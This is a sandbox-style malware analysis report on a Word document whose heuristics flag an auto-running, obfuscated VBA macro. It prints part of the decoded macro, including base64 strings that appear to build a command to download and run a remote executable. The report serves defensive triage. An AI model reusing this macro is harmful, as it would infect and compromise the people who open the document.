MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a Microsoft Office document containing a VBA macro. The macro is triggered by the Document_Open event and utilizes the Shell() function, indicating an attempt to execute arbitrary commands. The presence of obfuscated code and a ClamAV detection signature for 'Doc.Macro.Obfuscation' suggests a malicious downloader or dropper.
Heuristics 7
-
ClamAV: Doc.Macro.Obfuscation-6332451-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Obfuscation-6332451-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19276 bytes |
SHA-256: cff55cd9d78a573e5e99605e8a5e9108a5bb554c8defb4e9a88ee35219520f32 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
If Len("hs41m6zP") <> 221 Then
' fMxdYz2b
Else
' hR4UAN3
MsgBox "vIm0t", 31, "ZBDAd8ET"
End If
Dim xK9wTGRA
xK9wTGRA = Array("KNCegz5Aw", "lPASKf")
daircBL0 = xK9wTGRA(0)
v7yGER = "5ZVhza2QyVmlZMnhwWlc1MExrUnZkMjVzYjJGa1JtbHNaU2drYlhsMWNtd3VWRzlUZEhKcGJtY29LU3dnSkhCaGRHZ3"
aSKla = "BPMU4wWVhKMExWQnliMk5sYzNNZ0pIQmhkR2c3WW5KbFlXczdmV05oZEdOb2UzMTk="
Dim bU23xtYb
bU23xtYb = Array("lKBDC")
nXJ5Y0 = bU23xtYb(0)
Dim JRmGES4DL
JRmGES4DL = Array("tWkM5", "Z62wZ")
rzUAF72iO = JRmGES4DL(1)
Dim RG0TV5Kqn
RG0TV5Kqn = v7yGER & aSKla
mJa056X = "WTIxa0lDOXJJSE5sZENCZlVFOVhSVkk5Y0c5M1pYSW1KaUJ6WlhRZ1gxTklSVXhNUFhOb1pXeHNKaVlnWTJGc2JDQWxYMUJQVjBWU0pTVmZVMGhGVEV3bElDUjNaV0pqYkdsbGJuUWdQU0J1WlhjdGIySnFaV04wSUZONWMzUmxiUzVPWlhRdVYyVmlRMnhwWlc1ME95UnRlWFZ5YkhNZ1BTQW5hSFIwY0Rvdkx6RTVN"
aIb0RYJ = "UzQ1Tmk0eU5Ea3VNVEF4TDJ0bGVTNXpheWN1VTNCc2FYUW9KeXduS1Rza2NHRjBhQ0E5SUNSbGJuWTZkR1Z0Y0NBcklDZGNmblJ0Y0M1bGVHVW5PMlp2Y21WaFkyZ29KRzE1ZFhKc0lHbHVJQ1J0ZVhWeWJITXBlM1J"
If Len("KZgPOEL") <> 251 Then
' EpyTqos7
Else
' EvLUJp
MsgBox "nZzcMQ", 60, "ifIBEwAu"
End If
Dim wcS0YwBU
wcS0YwBU = Array("QXz6AHZM9", "FTpBMhLe", "X8yJED4")
idxVB = wcS0YwBU(2)
Dim z4apeY
z4apeY = mJa056X & aIb0RYJ
Dim FvgkYS
FvgkYS = Array("xjiFwAp9c")
yALKR4Q = FvgkYS(0)
Ad1qHY = z4apeY & RG0TV5Kqn
Dim PaduYn62
PaduYn62 = Array("HJLYh", "ycB5um")
IKI1ls = PaduYn62(1)
If Len("T2TxU7fd") <> 224 Then
' v2C5KAMO
Else
' XscuPjkE
MsgBox "tlupn8B", 12, "Oogju5rOD"
End If
If Len("GxHEAN") <> 236 Then
' ftRKg
Else
' DasSPiVZ
MsgBox "HPxZOV", 36, "vEdwqRgj"
End If
Dim EbQHuiSh
EbQHuiSh = Array("nZXUPRhM")
WX9wBlRA = EbQHuiSh(0)
Dim QSuOv6G
QSuOv6G = Array("k24KqNm")
Pe8O4 = QSuOv6G(0)
Dim VMUOJIEqn
VMUOJIEqn = Array("vDZa458", "FfRQi")
EVByfAKg = VMUOJIEqn(0)
If Len("MEoh5") <> 218 Then
' gFUDm0
Else
' ZhO3Io
MsgBox "E9s6Q0cH", 30, "C5LN9X8g"
End If
sex Ad1qHY
End Sub
Attribute VB_Name = "WqDivFh"
Sub sex(wra8KUL)
Dim rWxQwBHAd
rWxQwBHAd = Array("AXG4aY", "l9bMza")
FJg2TFKXR = rWxQwBHAd(1)
Dim lJg0n5
lJg0n5 = Array("pDCYZztj", "N8chDR57Y")
Pjn9phx6 = lJg0n5(0)
If Len("GqWEC8jxr") <> 145 Then
' iLC6AZv8
Else
' mazqZG
MsgBox "r5MTUpe", 61, "dgvGsq7Mn"
End If
Dim UXDyUWb
UXDyUWb = Array("ZmfzTI", "aCNBy6c")
svauP07 = UXDyUWb(1)
Dim UTm8XPe4M
UTm8XPe4M = Array("jOLsB", "e739s1SR8", "mtW4zAj")
tBpWKmX = UTm8XPe4M(0)
Dim XoyJR1XfN
XoyJR1XfN = Array("ULsAqt4", "JWTSk")
LWK1ncyN = XoyJR1XfN(0)
Dim Umvj7p
Umvj7p = Array("feEQTyRx")
EHCumV47B = Umvj7p(0)
Dim RHAln6
RHAln6 = Array("hUve8", "g8pnKLx", "XOzCxTMU")
H45fok2 = RHAln6(1)
Dim eyI1oYxJ
eyI1oYxJ = Array("hIjzT", "sYLulAKw")
us6Lo7 = eyI1oYxJ(1)
Dim O5CqmVKd
O5CqmVKd = Array("wywON8V2", "FuWi2O")
xwglNU = O5CqmVKd(1)
Dim Ad2qrKTc
Ad2qrKTc = Array("Pe36BuV", "qK1ZJIi")
eQdC1KGtm = Ad2qrKTc(0)
Dim ZcE3IWe7
ZcE3IWe7 = Array("opdOjw0ne")
ayaTrxP0f = ZcE3IWe7(0)
Dim xwKuEUVo
xwKuEUVo = Array("jwinf50", "usn2WgkNl", "gMXiDT4u")
y6t3U = xwKuEUVo(1)
Dim MSfr5pj3
MSfr5pj3 = Array("s3uxSK2UF", "M6nJQOf", "jwXfMTi")
buxMrRB = MSfr5pj3(2)
Dim OOaRy
OOaRy = Array("RbQnu", "fe1xJ7SIG", "tbjHSm1")
hVpbYO = OOaRy(0)
Dim RSlJqzuF
RSlJqzuF = Array("RCOepYjx", "bC1wAU2jp", "vNwf63")
pYIVo = RSlJqzuF(0)
Dim KUfc8JT
KUfc8JT = Array("T57sRSpu", "APpZnx", "byIpQt1")
K5My4uLAl = KUfc8JT(0)
Dim DrGHIl
DrGHIl = Array("vh576jJ", "xjFdD5Y")
GLC65 = DrGHIl(0)
Dim AvhcB
AvhcB = Array("jauHDgE9o", "SGKsz", "gZLbt")
vaWgt = AvhcB(0)
Dim svUnZ6O
svUnZ6O = Array("yIamdy3")
ND2eyRjdn = svUnZ6O(0)
Dim bO7ZJ
bO7ZJ = Array("kfOlK")
xkNJe = bO7ZJ(0)
Dim xhVi8G
xhVi8G = Array("IcgKJ", "zohSnkYJ")
BouJnS8 = xhVi8G(1)
If Len("DwTAN") <> 162 Then
' Vw6Z0FNDt
Else
' rrm2c
MsgBox "l8ODv63r", 28, "pklSRr"
End If
If Len("VQAvqG0X") <> 165 Then
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.